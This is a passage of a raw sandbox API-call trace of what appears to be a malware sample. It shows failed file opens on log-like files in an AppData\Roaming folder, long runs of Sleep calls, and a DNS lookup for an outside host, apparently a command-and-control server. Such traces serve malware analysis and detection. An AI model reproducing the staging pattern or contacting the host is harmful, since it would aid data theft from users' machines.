0xc000003a [0225.380] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0225.380] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e068f0) returned 1 [0225.380] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.380] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.380] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0225.380] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e068f0) returned 1 [0225.380] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtPathName=0x1302fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.380] NtCreateFile (in: FileHandle=0x1302fa50, DesiredAccess=0x120089, ObjectAttributes=0x1302fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa50*=0xffffffffffffffff, IoStatusBlock=0x1302fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.380] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302f9d0 | out: HeapArray=0x1302f9d0*=0x5c0000) returned 0x6 [0225.380] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e068f0) returned 1 [0225.380] Sleep (dwMilliseconds=0x7d0) [0225.383] Sleep (dwMilliseconds=0x7d0) [0225.384] Sleep (dwMilliseconds=0x7d0) [0225.385] Sleep (dwMilliseconds=0x7d0) [0225.387] Sleep (dwMilliseconds=0x7d0) [0225.388] Sleep (dwMilliseconds=0x7d0) [0225.390] Sleep (dwMilliseconds=0x7d0) [0225.391] Sleep (dwMilliseconds=0x7d0) [0225.393] Sleep (dwMilliseconds=0x7d0) [0225.394] Sleep (dwMilliseconds=0x7d0) [0225.396] Sleep (dwMilliseconds=0x7d0) [0225.397] Sleep (dwMilliseconds=0x7d0) [0225.399] Sleep (dwMilliseconds=0x7d0) [0225.400] Sleep (dwMilliseconds=0x7d0) [0225.402] Sleep (dwMilliseconds=0x7d0) [0225.405] Sleep (dwMilliseconds=0x7d0) [0225.406] Sleep (dwMilliseconds=0x7d0) [0225.407] Sleep (dwMilliseconds=0x7d0) [0225.409] Sleep (dwMilliseconds=0x7d0) [0225.410] Sleep (dwMilliseconds=0x7d0) [0225.414] Sleep (dwMilliseconds=0x7d0) [0225.416] Sleep (dwMilliseconds=0x7d0) [0225.417] Sleep (dwMilliseconds=0x7d0) [0225.419] Sleep (dwMilliseconds=0x7d0) [0225.420] Sleep (dwMilliseconds=0x7d0) [0225.422] Sleep (dwMilliseconds=0x7d0) [0225.424] Sleep (dwMilliseconds=0x7d0) [0225.426] Sleep (dwMilliseconds=0x7d0) [0225.427] Sleep (dwMilliseconds=0x7d0) [0225.429] Sleep (dwMilliseconds=0x7d0) [0225.430] Sleep (dwMilliseconds=0x7d0) [0225.432] Sleep (dwMilliseconds=0x7d0) [0225.434] Sleep (dwMilliseconds=0x7d0) [0225.436] Sleep (dwMilliseconds=0x7d0) [0225.438] Sleep (dwMilliseconds=0x7d0) [0225.440] Sleep (dwMilliseconds=0x7d0) [0225.441] Sleep (dwMilliseconds=0x7d0) [0225.443] Sleep (dwMilliseconds=0x7d0) [0225.445] Sleep (dwMilliseconds=0x7d0) [0225.447] Sleep (dwMilliseconds=0x7d0) [0225.449] Sleep (dwMilliseconds=0x7d0) [0225.450] Sleep (dwMilliseconds=0x7d0) [0225.452] Sleep (dwMilliseconds=0x7d0) [0225.453] Sleep (dwMilliseconds=0x7d0) [0225.455] Sleep (dwMilliseconds=0x7d0) [0225.457] Sleep (dwMilliseconds=0x7d0) [0225.459] Sleep (dwMilliseconds=0x7d0) [0225.460] Sleep (dwMilliseconds=0x7d0) [0225.462] Sleep (dwMilliseconds=0x7d0) [0225.463] Sleep (dwMilliseconds=0x7d0) [0225.465] Sleep (dwMilliseconds=0x7d0) [0225.466] Sleep (dwMilliseconds=0x7d0) [0225.468] Sleep (dwMilliseconds=0x7d0) [0225.469] Sleep (dwMilliseconds=0x7d0) [0225.471] Sleep (dwMilliseconds=0x7d0) [0225.472] Sleep (dwMilliseconds=0x7d0) [0225.474] Sleep (dwMilliseconds=0x7d0) [0225.475] Sleep (dwMilliseconds=0x7d0) [0225.477] Sleep (dwMilliseconds=0x7d0) [0225.479] Sleep (dwMilliseconds=0x7d0) [0225.481] Sleep (dwMilliseconds=0x7d0) [0225.482] Sleep (dwMilliseconds=0x7d0) [0225.484] Sleep (dwMilliseconds=0x7d0) [0225.485] Sleep (dwMilliseconds=0x7d0) [0225.487] Sleep (dwMilliseconds=0x7d0) [0225.489] Sleep (dwMilliseconds=0x7d0) [0225.491] Sleep (dwMilliseconds=0x7d0) [0225.493] Sleep (dwMilliseconds=0x7d0) [0225.494] Sleep (dwMilliseconds=0x7d0) [0225.496] Sleep (dwMilliseconds=0x7d0) [0225.497] Sleep (dwMilliseconds=0x7d0) [0225.499] Sleep (dwMilliseconds=0x7d0) [0225.501] Sleep (dwMilliseconds=0x7d0) [0225.504] Sleep (dwMilliseconds=0x7d0) [0225.505] Sleep (dwMilliseconds=0x7d0) [0225.507] Sleep (dwMilliseconds=0x7d0) [0225.508] Sleep (dwMilliseconds=0x7d0) [0225.510] Sleep (dwMilliseconds=0x7d0) [0225.511] Sleep (dwMilliseconds=0x7d0) [0225.513] Sleep (dwMilliseconds=0x7d0) [0225.514] Sleep (dwMilliseconds=0x7d0) [0225.516] Sleep (dwMilliseconds=0x7d0) [0225.517] Sleep (dwMilliseconds=0x7d0) [0225.519] Sleep (dwMilliseconds=0x7d0) [0225.520] Sleep (dwMilliseconds=0x7d0) [0225.523] Sleep (dwMilliseconds=0x7d0) [0225.526] Sleep (dwMilliseconds=0x7d0) [0225.527] Sleep (dwMilliseconds=0x7d0) [0225.529] Sleep (dwMilliseconds=0x7d0) [0225.530] Sleep (dwMilliseconds=0x7d0) [0225.534] Sleep (dwMilliseconds=0x7d0) [0225.536] Sleep (dwMilliseconds=0x7d0) [0225.539] Sleep (dwMilliseconds=0x7d0) [0225.540] Sleep (dwMilliseconds=0x7d0) [0225.542] Sleep (dwMilliseconds=0x7d0) [0225.543] Sleep (dwMilliseconds=0x7d0) [0225.545] Sleep (dwMilliseconds=0x7d0) [0225.548] Sleep (dwMilliseconds=0x7d0) [0225.549] Sleep (dwMilliseconds=0x7d0) [0225.551] Sleep (dwMilliseconds=0x7d0) [0225.552] Sleep (dwMilliseconds=0x7d0) [0225.554] Sleep (dwMilliseconds=0x7d0) [0225.555] Sleep (dwMilliseconds=0x7d0) [0225.557] Sleep (dwMilliseconds=0x7d0) [0225.558] Sleep (dwMilliseconds=0x7d0) [0225.560] Sleep (dwMilliseconds=0x7d0) [0225.561] Sleep (dwMilliseconds=0x7d0) [0225.563] Sleep (dwMilliseconds=0x7d0) [0225.564] Sleep (dwMilliseconds=0x7d0) [0225.566] Sleep (dwMilliseconds=0x7d0) [0225.568] Sleep (dwMilliseconds=0x7d0) [0225.570] Sleep (dwMilliseconds=0x7d0) [0225.572] Sleep (dwMilliseconds=0x7d0) [0225.573] Sleep (dwMilliseconds=0x7d0) [0225.575] Sleep (dwMilliseconds=0x7d0) [0225.576] Sleep (dwMilliseconds=0x7d0) [0225.578] Sleep (dwMilliseconds=0x7d0) [0225.581] Sleep (dwMilliseconds=0x7d0) [0225.582] Sleep (dwMilliseconds=0x7d0) [0225.584] Sleep (dwMilliseconds=0x7d0) [0225.585] Sleep (dwMilliseconds=0x7d0) [0225.587] Sleep (dwMilliseconds=0x7d0) [0225.590] Sleep (dwMilliseconds=0x7d0) [0225.592] Sleep (dwMilliseconds=0x7d0) [0225.594] Sleep (dwMilliseconds=0x7d0) [0225.595] Sleep (dwMilliseconds=0x7d0) [0225.597] Sleep (dwMilliseconds=0x7d0) [0225.598] Sleep (dwMilliseconds=0x7d0) [0225.600] Sleep (dwMilliseconds=0x7d0) [0225.601] Sleep (dwMilliseconds=0x7d0) [0225.603] Sleep (dwMilliseconds=0x7d0) [0225.604] Sleep (dwMilliseconds=0x7d0) [0225.606] Sleep (dwMilliseconds=0x7d0) [0225.607] Sleep (dwMilliseconds=0x7d0) [0225.609] Sleep (dwMilliseconds=0x7d0) [0225.612] Sleep (dwMilliseconds=0x7d0) [0225.614] Sleep (dwMilliseconds=0x7d0) [0225.616] Sleep (dwMilliseconds=0x7d0) [0225.617] Sleep (dwMilliseconds=0x7d0) [0225.619] Sleep (dwMilliseconds=0x7d0) [0225.620] Sleep (dwMilliseconds=0x7d0) [0225.622] Sleep (dwMilliseconds=0x7d0) [0225.624] Sleep (dwMilliseconds=0x7d0) [0225.625] Sleep (dwMilliseconds=0x7d0) [0225.627] Sleep (dwMilliseconds=0x7d0) [0225.628] Sleep (dwMilliseconds=0x7d0) [0225.630] Sleep (dwMilliseconds=0x7d0) [0225.631] Sleep (dwMilliseconds=0x7d0) [0225.633] Sleep (dwMilliseconds=0x7d0) [0225.634] Sleep (dwMilliseconds=0x7d0) [0225.636] Sleep (dwMilliseconds=0x7d0) [0225.637] Sleep (dwMilliseconds=0x7d0) [0225.640] Sleep (dwMilliseconds=0x7d0) [0225.641] Sleep (dwMilliseconds=0x7d0) [0225.644] Sleep (dwMilliseconds=0x7d0) [0225.646] Sleep (dwMilliseconds=0x7d0) [0225.647] Sleep (dwMilliseconds=0x7d0) [0225.649] Sleep (dwMilliseconds=0x7d0) [0225.650] Sleep (dwMilliseconds=0x7d0) [0225.652] Sleep (dwMilliseconds=0x7d0) [0225.655] Sleep (dwMilliseconds=0x7d0) [0225.657] Sleep (dwMilliseconds=0x7d0) [0225.658] Sleep (dwMilliseconds=0x7d0) [0225.660] Sleep (dwMilliseconds=0x7d0) [0225.661] Sleep (dwMilliseconds=0x7d0) [0225.663] Sleep (dwMilliseconds=0x7d0) [0225.666] Sleep (dwMilliseconds=0x7d0) [0225.668] Sleep (dwMilliseconds=0x7d0) [0225.669] Sleep (dwMilliseconds=0x7d0) [0225.671] Sleep (dwMilliseconds=0x7d0) [0225.672] Sleep (dwMilliseconds=0x7d0) [0225.674] Sleep (dwMilliseconds=0x7d0) [0225.675] Sleep (dwMilliseconds=0x7d0) [0225.677] Sleep (dwMilliseconds=0x7d0) [0225.678] Sleep (dwMilliseconds=0x7d0) [0225.680] Sleep (dwMilliseconds=0x7d0) [0225.681] Sleep (dwMilliseconds=0x7d0) [0225.683] Sleep (dwMilliseconds=0x7d0) [0225.684] Sleep (dwMilliseconds=0x7d0) [0225.686] Sleep (dwMilliseconds=0x7d0) [0225.688] Sleep (dwMilliseconds=0x7d0) [0225.690] Sleep (dwMilliseconds=0x7d0) [0225.692] Sleep (dwMilliseconds=0x7d0) [0225.693] Sleep (dwMilliseconds=0x7d0) [0225.695] Sleep (dwMilliseconds=0x7d0) [0225.696] Sleep (dwMilliseconds=0x7d0) [0225.698] Sleep (dwMilliseconds=0x7d0) [0225.700] Sleep (dwMilliseconds=0x7d0) [0225.702] Sleep (dwMilliseconds=0x7d0) [0225.704] Sleep (dwMilliseconds=0x7d0) [0225.706] Sleep (dwMilliseconds=0x7d0) [0225.707] Sleep (dwMilliseconds=0x7d0) [0225.709] Sleep (dwMilliseconds=0x7d0) [0225.710] Sleep (dwMilliseconds=0x7d0) [0225.712] Sleep (dwMilliseconds=0x7d0) [0225.714] Sleep (dwMilliseconds=0x7d0) [0225.715] Sleep (dwMilliseconds=0x7d0) [0225.717] Sleep (dwMilliseconds=0x7d0) [0225.718] Sleep (dwMilliseconds=0x7d0) [0225.720] Sleep (dwMilliseconds=0x7d0) [0225.721] Sleep (dwMilliseconds=0x7d0) [0225.723] Sleep (dwMilliseconds=0x7d0) [0225.724] Sleep (dwMilliseconds=0x7d0) [0225.726] Sleep (dwMilliseconds=0x7d0) [0225.727] Sleep (dwMilliseconds=0x7d0) [0225.729] Sleep (dwMilliseconds=0x7d0) [0225.730] Sleep (dwMilliseconds=0x7d0) [0225.732] Sleep (dwMilliseconds=0x7d0) [0225.734] Sleep (dwMilliseconds=0x7d0) [0225.736] Sleep (dwMilliseconds=0x7d0) [0225.737] Sleep (dwMilliseconds=0x7d0) [0225.739] Sleep (dwMilliseconds=0x7d0) [0225.740] Sleep (dwMilliseconds=0x7d0) [0225.742] Sleep (dwMilliseconds=0x7d0) [0225.744] Sleep (dwMilliseconds=0x7d0) [0225.745] Sleep (dwMilliseconds=0x7d0) [0225.747] Sleep (dwMilliseconds=0x7d0) [0225.749] Sleep (dwMilliseconds=0x7d0) [0225.750] Sleep (dwMilliseconds=0x7d0) [0225.752] Sleep (dwMilliseconds=0x7d0) [0225.755] Sleep (dwMilliseconds=0x7d0) [0225.757] Sleep (dwMilliseconds=0x7d0) [0225.758] Sleep (dwMilliseconds=0x7d0) [0225.759] Sleep (dwMilliseconds=0x7d0) [0225.761] Sleep (dwMilliseconds=0x7d0) [0225.762] Sleep (dwMilliseconds=0x7d0) [0225.764] Sleep (dwMilliseconds=0x7d0) [0225.765] Sleep (dwMilliseconds=0x7d0) [0225.767] Sleep (dwMilliseconds=0x7d0) [0225.768] Sleep (dwMilliseconds=0x7d0) [0225.770] Sleep (dwMilliseconds=0x7d0) [0225.771] Sleep (dwMilliseconds=0x7d0) [0225.774] Sleep (dwMilliseconds=0x7d0) [0225.778] Sleep (dwMilliseconds=0x7d0) [0225.779] Sleep (dwMilliseconds=0x7d0) [0225.781] Sleep (dwMilliseconds=0x7d0) [0225.782] Sleep (dwMilliseconds=0x7d0) [0225.784] Sleep (dwMilliseconds=0x7d0) [0225.785] Sleep (dwMilliseconds=0x7d0) [0225.789] Sleep (dwMilliseconds=0x7d0) [0225.791] Sleep (dwMilliseconds=0x7d0) [0225.792] Sleep (dwMilliseconds=0x7d0) [0225.794] Sleep (dwMilliseconds=0x7d0) [0225.795] Sleep (dwMilliseconds=0x7d0) [0225.797] Sleep (dwMilliseconds=0x7d0) [0225.799] Sleep (dwMilliseconds=0x7d0) [0225.800] Sleep (dwMilliseconds=0x7d0) [0225.802] Sleep (dwMilliseconds=0x7d0) [0225.803] Sleep (dwMilliseconds=0x7d0) [0225.805] Sleep (dwMilliseconds=0x7d0) [0225.807] Sleep (dwMilliseconds=0x7d0) [0225.811] Sleep (dwMilliseconds=0x7d0) [0225.817] Sleep (dwMilliseconds=0x7d0) [0225.818] Sleep (dwMilliseconds=0x7d0) [0225.823] Sleep (dwMilliseconds=0x7d0) [0225.824] Sleep (dwMilliseconds=0x7d0) [0225.826] Sleep (dwMilliseconds=0x7d0) [0225.827] Sleep (dwMilliseconds=0x7d0) [0225.829] Sleep (dwMilliseconds=0x7d0) [0225.833] Sleep (dwMilliseconds=0x7d0) [0225.835] Sleep (dwMilliseconds=0x7d0) [0225.836] Sleep (dwMilliseconds=0x7d0) [0225.838] Sleep (dwMilliseconds=0x7d0) [0225.840] Sleep (dwMilliseconds=0x7d0) [0225.842] Sleep (dwMilliseconds=0x7d0) [0225.843] Sleep (dwMilliseconds=0x7d0) [0225.845] Sleep (dwMilliseconds=0x7d0) [0225.846] Sleep (dwMilliseconds=0x7d0) [0225.848] Sleep (dwMilliseconds=0x7d0) [0225.849] Sleep (dwMilliseconds=0x7d0) [0225.851] Sleep (dwMilliseconds=0x7d0) [0225.856] Sleep (dwMilliseconds=0x7d0) [0225.858] Sleep (dwMilliseconds=0x7d0) [0225.859] Sleep (dwMilliseconds=0x7d0) [0225.861] Sleep (dwMilliseconds=0x7d0) [0225.862] Sleep (dwMilliseconds=0x7d0) [0225.868] Sleep (dwMilliseconds=0x7d0) [0225.869] Sleep (dwMilliseconds=0x7d0) [0225.871] Sleep (dwMilliseconds=0x7d0) [0225.872] Sleep (dwMilliseconds=0x7d0) [0225.874] Sleep (dwMilliseconds=0x7d0) [0225.878] Sleep (dwMilliseconds=0x7d0) [0225.880] Sleep (dwMilliseconds=0x7d0) [0225.881] Sleep (dwMilliseconds=0x7d0) [0225.883] Sleep (dwMilliseconds=0x7d0) [0225.884] Sleep (dwMilliseconds=0x7d0) [0225.886] Sleep (dwMilliseconds=0x7d0) [0225.887] Sleep (dwMilliseconds=0x7d0) [0225.889] Sleep (dwMilliseconds=0x7d0) [0225.890] Sleep (dwMilliseconds=0x7d0) [0225.892] Sleep (dwMilliseconds=0x7d0) [0225.893] Sleep (dwMilliseconds=0x7d0) [0225.895] Sleep (dwMilliseconds=0x7d0) [0225.901] Sleep (dwMilliseconds=0x7d0) [0225.902] Sleep (dwMilliseconds=0x7d0) [0225.904] Sleep (dwMilliseconds=0x7d0) [0225.905] Sleep (dwMilliseconds=0x7d0) [0225.907] Sleep (dwMilliseconds=0x7d0) [0225.911] Sleep (dwMilliseconds=0x7d0) [0225.913] Sleep (dwMilliseconds=0x7d0) [0225.915] Sleep (dwMilliseconds=0x7d0) [0225.916] Sleep (dwMilliseconds=0x7d0) [0225.918] Sleep (dwMilliseconds=0x7d0) [0225.922] Sleep (dwMilliseconds=0x7d0) [0225.924] Sleep (dwMilliseconds=0x7d0) [0225.926] Sleep (dwMilliseconds=0x7d0) [0225.927] Sleep (dwMilliseconds=0x7d0) [0225.929] Sleep (dwMilliseconds=0x7d0) [0225.930] Sleep (dwMilliseconds=0x7d0) [0225.932] Sleep (dwMilliseconds=0x7d0) [0225.933] Sleep (dwMilliseconds=0x7d0) [0225.935] Sleep (dwMilliseconds=0x7d0) [0225.936] Sleep (dwMilliseconds=0x7d0) [0225.938] Sleep (dwMilliseconds=0x7d0) [0225.940] Sleep (dwMilliseconds=0x7d0) [0225.944] Sleep (dwMilliseconds=0x7d0) [0225.946] Sleep (dwMilliseconds=0x7d0) [0225.947] Sleep (dwMilliseconds=0x7d0) [0225.949] Sleep (dwMilliseconds=0x7d0) [0225.950] Sleep (dwMilliseconds=0x7d0) [0225.956] Sleep (dwMilliseconds=0x7d0) [0225.957] Sleep (dwMilliseconds=0x7d0) [0225.959] Sleep (dwMilliseconds=0x7d0) [0225.960] Sleep (dwMilliseconds=0x7d0) [0225.962] Sleep (dwMilliseconds=0x7d0) [0225.967] Sleep (dwMilliseconds=0x7d0) [0225.968] Sleep (dwMilliseconds=0x7d0) [0225.970] Sleep (dwMilliseconds=0x7d0) [0225.971] Sleep (dwMilliseconds=0x7d0) [0225.973] Sleep (dwMilliseconds=0x7d0) [0225.974] Sleep (dwMilliseconds=0x7d0) [0225.976] Sleep (dwMilliseconds=0x7d0) [0225.977] Sleep (dwMilliseconds=0x7d0) [0225.980] Sleep (dwMilliseconds=0x7d0) [0225.984] Sleep (dwMilliseconds=0x7d0) [0225.989] Sleep (dwMilliseconds=0x7d0) [0225.990] Sleep (dwMilliseconds=0x7d0) [0225.992] Sleep (dwMilliseconds=0x7d0) [0225.993] Sleep (dwMilliseconds=0x7d0) [0225.995] Sleep (dwMilliseconds=0x7d0) [0226.000] Sleep (dwMilliseconds=0x7d0) [0226.002] Sleep (dwMilliseconds=0x7d0) [0226.003] Sleep (dwMilliseconds=0x7d0) [0226.005] Sleep (dwMilliseconds=0x7d0) [0226.006] Sleep (dwMilliseconds=0x7d0) [0226.008] Sleep (dwMilliseconds=0x7d0) [0226.009] Sleep (dwMilliseconds=0x7d0) [0226.011] Sleep (dwMilliseconds=0x7d0) [0226.012] Sleep (dwMilliseconds=0x7d0) [0226.014] Sleep (dwMilliseconds=0x7d0) [0226.055] Sleep (dwMilliseconds=0x7d0) [0226.057] Sleep (dwMilliseconds=0x7d0) [0226.058] Sleep (dwMilliseconds=0x7d0) [0226.060] Sleep (dwMilliseconds=0x7d0) [0226.061] Sleep (dwMilliseconds=0x7d0) [0226.063] Sleep (dwMilliseconds=0x7d0) [0226.067] Sleep (dwMilliseconds=0x7d0) [0226.069] Sleep (dwMilliseconds=0x7d0) [0226.071] Sleep (dwMilliseconds=0x7d0) [0226.072] Sleep (dwMilliseconds=0x7d0) [0226.077] Sleep (dwMilliseconds=0x7d0) [0226.079] Sleep (dwMilliseconds=0x7d0) [0226.081] Sleep (dwMilliseconds=0x7d0) [0226.082] Sleep (dwMilliseconds=0x7d0) [0226.084] Sleep (dwMilliseconds=0x7d0) [0226.089] Sleep (dwMilliseconds=0x7d0) [0226.090] Sleep (dwMilliseconds=0x7d0) [0226.092] Sleep (dwMilliseconds=0x7d0) [0226.093] Sleep (dwMilliseconds=0x7d0) [0226.095] Sleep (dwMilliseconds=0x7d0) [0226.096] Sleep (dwMilliseconds=0x7d0) [0226.099] Sleep (dwMilliseconds=0x7d0) [0226.101] Sleep (dwMilliseconds=0x7d0) [0226.102] Sleep (dwMilliseconds=0x7d0) [0226.104] Sleep (dwMilliseconds=0x7d0) [0226.105] Sleep (dwMilliseconds=0x7d0) [0226.110] Sleep (dwMilliseconds=0x7d0) [0226.111] Sleep (dwMilliseconds=0x7d0) [0226.113] Sleep (dwMilliseconds=0x7d0) [0226.114] Sleep (dwMilliseconds=0x7d0) [0226.116] Sleep (dwMilliseconds=0x7d0) [0226.121] Sleep (dwMilliseconds=0x7d0) [0226.122] Sleep (dwMilliseconds=0x7d0) [0226.124] Sleep (dwMilliseconds=0x7d0) [0226.168] Sleep (dwMilliseconds=0x7d0) [0226.169] Sleep (dwMilliseconds=0x7d0) [0226.171] Sleep (dwMilliseconds=0x7d0) [0226.176] Sleep (dwMilliseconds=0x7d0) [0226.177] Sleep (dwMilliseconds=0x7d0) [0226.179] Sleep (dwMilliseconds=0x7d0) [0226.180] Sleep (dwMilliseconds=0x7d0) [0226.182] Sleep (dwMilliseconds=0x7d0) [0226.183] Sleep (dwMilliseconds=0x7d0) [0226.185] Sleep (dwMilliseconds=0x7d0) [0226.186] Sleep (dwMilliseconds=0x7d0) [0226.188] Sleep (dwMilliseconds=0x7d0) [0226.189] Sleep (dwMilliseconds=0x7d0) [0226.191] Sleep (dwMilliseconds=0x7d0) [0226.192] Sleep (dwMilliseconds=0x7d0) [0226.194] Sleep (dwMilliseconds=0x7d0) [0226.198] Sleep (dwMilliseconds=0x7d0) [0226.200] Sleep (dwMilliseconds=0x7d0) [0226.202] Sleep (dwMilliseconds=0x7d0) [0226.204] Sleep (dwMilliseconds=0x7d0) [0226.209] Sleep (dwMilliseconds=0x7d0) [0226.211] Sleep (dwMilliseconds=0x7d0) [0226.212] Sleep (dwMilliseconds=0x7d0) [0226.214] Sleep (dwMilliseconds=0x7d0) [0226.215] Sleep (dwMilliseconds=0x7d0) [0226.217] Sleep (dwMilliseconds=0x7d0) [0226.218] Sleep (dwMilliseconds=0x7d0) [0226.221] Sleep (dwMilliseconds=0x7d0) [0226.223] Sleep (dwMilliseconds=0x7d0) [0226.224] Sleep (dwMilliseconds=0x7d0) [0226.226] Sleep (dwMilliseconds=0x7d0) [0226.252] Sleep (dwMilliseconds=0x7d0) [0226.255] Sleep (dwMilliseconds=0x7d0) [0226.257] Sleep (dwMilliseconds=0x7d0) [0226.262] Sleep (dwMilliseconds=0x7d0) [0226.263] Sleep (dwMilliseconds=0x7d0) [0226.264] Sleep (dwMilliseconds=0x7d0) [0226.266] Sleep (dwMilliseconds=0x7d0) [0226.267] Sleep (dwMilliseconds=0x7d0) [0226.273] Sleep (dwMilliseconds=0x7d0) [0226.274] Sleep (dwMilliseconds=0x7d0) [0226.275] Sleep (dwMilliseconds=0x7d0) [0226.277] Sleep (dwMilliseconds=0x7d0) [0226.279] Sleep (dwMilliseconds=0x7d0) [0226.284] Sleep (dwMilliseconds=0x7d0) [0226.285] Sleep (dwMilliseconds=0x7d0) [0226.287] Sleep (dwMilliseconds=0x7d0) [0226.288] Sleep (dwMilliseconds=0x7d0) [0226.301] Sleep (dwMilliseconds=0x7d0) [0226.307] Sleep (dwMilliseconds=0x7d0) [0226.308] Sleep (dwMilliseconds=0x7d0) [0226.310] Sleep (dwMilliseconds=0x7d0) [0226.311] Sleep (dwMilliseconds=0x7d0) [0226.331] Sleep (dwMilliseconds=0x7d0) [0226.382] Sleep (dwMilliseconds=0x7d0) [0226.434] Sleep (dwMilliseconds=0x7d0) [0226.512] Sleep (dwMilliseconds=0x7d0) [0226.566] getaddrinfo (in: pNodeName="www.protocolohfresco.site", pServiceName="80", pHints=0x9e77dd8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x9e77e08 | out: ppResult=0x9e77e08*=0x0) returned 11001 [0226.576] Sleep (dwMilliseconds=0x7d0) [0226.579] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtPathName=0x1302fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.579] NtCreateFile (in: FileHandle=0x1302fac0, DesiredAccess=0x120089, ObjectAttributes=0x1302fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7log00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fac0*=0xffffffffffffffff, IoStatusBlock=0x1302fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.584] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa40 | out: HeapArray=0x1302fa40*=0x5c0000) returned 0x6 [0226.584] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e06d70) returned 1 [0226.584] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.584] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.584] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0226.584] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e06a10) returned 1 [0226.584] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: 